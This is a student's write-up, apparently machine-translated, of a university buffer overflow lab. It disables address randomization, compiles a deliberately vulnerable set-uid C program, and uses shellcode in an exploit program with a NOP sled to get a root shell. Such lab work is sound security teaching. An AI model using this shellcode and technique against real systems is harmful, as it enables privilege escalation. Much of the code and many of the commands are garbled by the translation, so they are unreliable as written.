Experiment one: Buffer overflow vulnerability Experiment 20115116 Huang

Buffer overflow attack: by writing to the program's buffer beyond its length content, causing buffer overflow, thereby destroying the program's stack, causing the program to crash or to make the program to execute other instructions to achieve the purpose of the attack.

First, the experimental requirements

1. in order to monitor the experiment process, we take the private course method, Enter the experiment Building course, Click to join the private course, enter the invitation code 2yte6j9x, enter the school number + name in the personal information;

2.the experimental reportBlog ParkHairBlogOpen, the focus is the experimental process of the results (to have), the problems encountered, solutions (do not be empty methods such as"Check the network","Ask your classmates","Reading"etc.) as well as analysis (from which you can get what revelation, what harvest, lessons, etc.);
3. Blog Parkof theBlogAddress toRegistration in the course Collaboration group;
4.Lab Class (2015.4.24) before completing the lab report.Blogstudents, time-independent arrangement of experimental class;
5.in theWindowson the buffer overflow experiment to realize the students have added points.

Second, the experimental description

A buffer overflow is a scenario in which a program attempts to write to a buffer beyond the pre-allocated fixed-length data. This vulnerability could be exploited by malicious users to alter the flow control of a program, or even execute arbitrary fragments of code. This vulnerability occurs because of a temporary shutdown of the data buffer and the return address, which causes the return address to be rewritten.

III. Preparation of the experiment

System User name Shiyanlou, password Shiyanlou

The experimental building provides a single -bit Ubuntu Linux, and this experiment in order to facilitate the observation of the Assembly statement, we need to operate in a Three-position environment, So we need to do some preparation before the experiment.

1, enter the command to install some of the things to compile the C -bit program:

sudo apt-get update

Then proceed with the input code

sudo apt-get install lib32z1 libc6-dev-i386

sudo apt-get install Lib32readline-gplv2-dev

2, enter the command "linux32" into the linux environment. At this point you will find that the command line is not as good as the tab completion, so enter "/bin/bash" using bash :

Iii. Experimental Step 3.1 initial Setup

In Ubuntu and some other Linux Systems, use address space randomization to random heap (heap) and Stack ( Stack The initial address, which makes it difficult to guess the exact memory address, and guessing the memory address is the key to the buffer overflow attack. So in this experiment, we use the following command to turn off this feature:

sudo sysctl-w kernel.randomize_va_space=0

In addition, in order to further protect against buffer overflow attacks and other uses of shell program attacks, many shell set-uid shell Keep the Span style= "font-family: ' Times New Roman ';" >root /bin /bash

In a Linux system,/bin/sh is actually a symbolic link to /bin/bash or /bin/dash . To reproduce the situation before this protective measure was implemented, we used another Shell program (zsh) instead of /bin/bash. The following instructions describe how to set up the zsh Program:

sudo su

Cd/bin

RM SH

In-s zsh SH

Exit

3.2 Shellcode

In general, a buffer overflow can cause a program to crash, and in the program, the overflow data overwrites the return address. And if the data that overwrites the return address is another address, then the program jumps to that address, and if the address is a piece of well-designed code to implement other functions, this code is shellcode.

Observe the following code:

#include <stdio.h>int main ()

{

Char *name[2];name[0] = "/bin/sh"; name[1] = Null;execve (name[0], name, NULL);}

The shellcodeof this experimentis the compiled version of the code just now:

\x31\xc0\x50\x68 "//sh" \x68 "/bin" \x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

3.3 Vulnerability Procedures

Save the following code as a "stack.c" file and save it to the/ tmp directory. The code is as follows:

/* STACK.C */

/* This program has a buffer overflow vulnerability. */

/* Our task was to exploit this vulnerability */

#include <stdlib.h>

#include <stdio.h>

#include <string.h>int bof (char *str)

{

Char buffer[12];/* The following statement has a buffer overflow problem */

strcpy (buffer, str); return 1;}

int main (int argc, char **argv)

{

Char str[517]; FILE *badfile;badfile = fopen ("Badfile", "R"), Fread (str, sizeof (char), 517, Badfile), BOF (str);p rintf ("returned Properly\n ");

return 1;}

The code lets you know that the program reads a file named "badfile" and loads the contents of the file into "buffer".

Compile the program, and set the set-uid. The command is as follows:

sudo sugcc-m32-g-z execstack-fno-stack-protector-o stack stack.cchmod u+s stackexit

The GCC compiler has a stack protection mechanism to prevent buffer overflows, so we need to use –fno-stack-protector to close this mechanism when compiling code.

The- z execstack is used to allow execution of the stack.

3.4 Attack Program

Our goal is to attack the vulnerability program just now and gain root access through the attack .

Save the following code as a "exploit.c" file and save it to the/ tmp directory. The code is as follows:

/* EXPLOIT.C */

/* A program this creates a file containing code for launching shell*/

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

Char shellcode[]=

"\x31\xc0"//xorl%eax,%eax

"\x50"//PUSHL%eax

"\x68" "//sh"//PUSHL $0x68732f2f

"\x68" "/bin"//PUSHL $0x6e69622f

"\x89\xe3"//movl%esp,%ebx

"\x50"//PUSHL%eax

"\x53"//PUSHL%ebx

"\x89\xe1"//movl%esp,%ecx

"\x99"//CDQ "\xb0\x0b"//movb $0x0b,%al

"\xcd\x80"//int $0x80;

void Main (int argc, char **argv)

{

Char buffer[517];

FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */

memset (&buffer, 0x90, 517);

/* need to fill the buffer with appropriate contents here */

strcpy (buffer, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ X90\x?? \x?? \x?? \x?? ");

strcpy (Buffer+100,shellcode);

/* Save the contents to the file "badfile" */

Badfile = fopen ("./badfile", "w");

fwrite (buffer, 517, 1, badfile);

Fclose (Badfile);

}

Notice the above code, "\x??" \x?? \x?? \x?? "Place to add Shellcode The address that is saved in memory because the location can overwrite the return address exactly after an overflow occurs.

and strcpy (buffer+100,shellcode); This sentence tells us again, Shellcode saved in buffer+100 the location.

Now we're going to get shellcode in-memory address, enter the command:

GDB Stack

Disass Main

Results

Next action:

According to the statement strcpy (buffer+100,shellcode); we calculate Shellcode the address is 0xffffd1b0 ( hex ) +100 ( decimal ) =0xffffd214 ( hex )

Modify exploit.c file Now! Will \x?? \x?? \x?? \x?? Modify to \x14\xd2\xff\xff

Then, compile the exploit.c Program:

Gcc-m32-o Exploit exploit.c

3.5 Attack Results

Run the attack program exploitbeforerunning the vulnerability stackand observe the results:

Visible, through the attack, get the root permission!

Iv. Summary

Problems: Because the speed is really slow, causing the input user name "Shiyanlou" When the response is always slow

Solution: Wait for a long time, the amount, is done in the bedroom, but still waiting for several, the result is not even on the experimental building, so I did a few times again.

Buffers are places where data is stored in memory. A buffer overflow occurs because there is not enough space when the program attempts to place the data in its own location in memory. in this experiment,Ubuntu and some other Linux systems use address space randomization to random heap (heap) and stack ( Stack), which makes it difficult to guess the exact memory address, and guessing the memory address is the key to the buffer overflow attack. This experiment is the first to put the operating system's protection mechanism off the premise of the buffer Overflow vulnerability experiment, even if the following command to close this function:

sudo sysctl-w kernel.randomize_va_space=0

Experiment one: Buffer overflow vulnerability Experiment 20115116 Huang